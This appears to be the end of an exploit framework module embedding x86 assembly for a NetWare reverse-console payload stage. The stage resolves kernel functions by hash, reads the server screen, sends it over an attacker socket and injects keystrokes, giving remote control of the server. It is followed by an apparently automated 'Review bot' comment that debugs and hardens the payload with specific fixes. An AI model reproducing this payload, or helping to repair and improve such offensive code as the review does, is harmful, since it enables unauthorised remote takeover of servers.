push [esp+8]
push [esp+8]
push [edi-0x40]
push [edi-0x24]
call sendrecv_data
add esp, 0x10
ret
recv_data:
push [esp+8]
push [esp+8]
push [edi-0x40]
push [edi-0x28]
call sendrecv_data
add esp, 0x10
ret
sendrecv_data:
push ebp
push ecx
push ebx
push edx
mov ebp, esp
push [ebp+0x20] ; iov_len
push [ebp+0x1C] ; iov_base
mov ecx, esp ; msg_iov
xor ebx, ebx ; struct msghdr
push ebx ; msg_flags
push ebx ; msg_controllen
push ebx ; msg_control
inc ebx
push ebx ; msg_iovlen (1 array)
dec ebx
push ecx ; msg_iov
push ebx ; msg_namelen
push ebx ; msg_name
mov ecx, esp ; message
sub esp, 4
mov edx, esp ; rescode
push edx ; rescode
push 0 ; flags
push ecx ; message
push [ebp+0x18] ; socket
call [ebp+0x14] ; SERVER.NLM|bsd_recvmsg_mp
mov esp, ebp
pop edx
pop ebx
pop ecx
pop ebp
ret
socket_ptr:
dd 0
fct_ptrs:
dd 0xadc21dfc ; SERVER.NLM|DirectUnformattedOutputToScreen
dd 0xb08c8051 ; LIBC.NLM|_ioctlsocket
dd 0x4907702d ; LIBC.NLM|bsd_close_mp
dd 0x312cc527 ; LIBC.NLM|bsd_shutdown_mp
dd 0x46c65ccd ; LIBC.NLM|bsd_select_mp
dd 0x3605cc1c ; LIBC.NLM|bsd_recvmsg_mp
dd 0x35bdd27c ; LIBC.NLM|bsd_sendmsg_mp
dd 0xe98bfec3 ; SERVER.NLM|AddKey
dd 0x6ea378a4 ; SERVER.NLM|ReadScreenIntoBuffer
dd 0x898d560c ; SERVER.NLM|GetScreenSize
dd 0x03cfcbe3 ; SERVER.NLM|GetSystemConsoleScreen
dd 0xfe52051f ; SERVER.NLM|GetInputCursorPosition
dd 0x9294bdcb ; SERVER.NLM|kWorkerThread
dd 0x6877687c ; AFPTCP.NLM|LB_malloc
dd 0xaf50f9e7 ; AFPTCP.NLM|LB_free
screen_info:
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0 ; screen checksum
dd 0 ; screen state
end_reverse:
nop
EOS
}
))
end
end
end end end end
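Review bot: in the `check_line` loop the screen byte is loaded with `mov al, byte ptr[edx]` (L1885) but `add esi, eax` (L1887) folds the whole register in, so the upper 24 bits of eax (left over from the `ReadScreenIntoBuffer` return at L1872) become part of the checksum and a change in that return value alone makes an unchanged screen get re-sent; use `movzx eax, byte ptr[edx]` as `send_input` already does at L1820. The `end:` path at L1853-L1864 shuts down and closes the socket but never releases the screen buffer obtained from `LB_malloc` at L1762, although `LB_free` is resolved in the table at L2025; free it before returning to `kWorkerThread`. The key buffer written at `edi+0x20` (L1805-L1812, up to 32 bytes plus the terminating zero) is not reserved in the data area, since `screen_info` ends at `edi+0x1C` and `end_reverse` follows, so it silently relies on the stager's heap allocation having slack after the stage; reserve it explicitly. Comment mismatches: L1817 and L1845 say `DirectOutputToScreen` but `[edi-0x3C]` is `DirectUnformattedOutputToScreen` (L2011), and L2001 says `SERVER.NLM|bsd_recvmsg_mp` although `[ebp+0x14]` is whichever of `bsd_sendmsg_mp` or `bsd_recvmsg_mp` the caller pushed at L1963/L1971, both from LIBC.NLM.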